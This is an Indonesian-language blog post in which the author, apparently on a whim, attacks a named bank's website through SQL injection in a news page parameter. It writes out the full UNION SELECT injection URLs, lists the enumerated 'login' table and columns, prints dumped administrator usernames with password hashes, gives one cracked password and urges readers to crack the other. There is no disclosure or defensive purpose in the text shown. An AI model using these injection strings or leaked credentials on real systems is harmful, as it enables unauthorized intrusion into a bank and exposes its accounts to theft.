lagi lagi boring!!
coba browsing aja deh eh nemunya alamat ini
cba liat deh isinya
http://www.bankofasia.com.np/
.
.
.
http://www.bankofasia.com.np/news-events/newsDetails.php?id=16'
ada celah nih
cba terusin ahh
http://www.bankofasia.com.np/news-events/newsDetails.php?id=16+AND+1=2+UNION+SELECT+0,(target),2,3,4,5,6
disitu ternyata tampatnya!!
coba cari isinya ah!!
Found a table called: login
Found a column called: username
Found a column called: password
Found a column called: id
Done searching inside table "login" for columns
ketemu deh!! sekarang tinggal keluarin
http://www.bankofasia.com.np/news-events/newsDetails.php?id=16+AND+1=2+UNION+SELECT+0,concat_ws(0x3a,id,username,password),2,3,4,5,6+from+login--
1:administrator:00aae2a236fbc47afc5aef04b9234e1c:
4:xchange:aa1d7136129e12252c4836e85f94ad82:
coba di cari passwordnya yg di BOLD
xchange!@ dapat deh
yg atas cari ndiri yah!!
Langganan:
Posting Komentar (Atom)
0 Comment:
Posting Komentar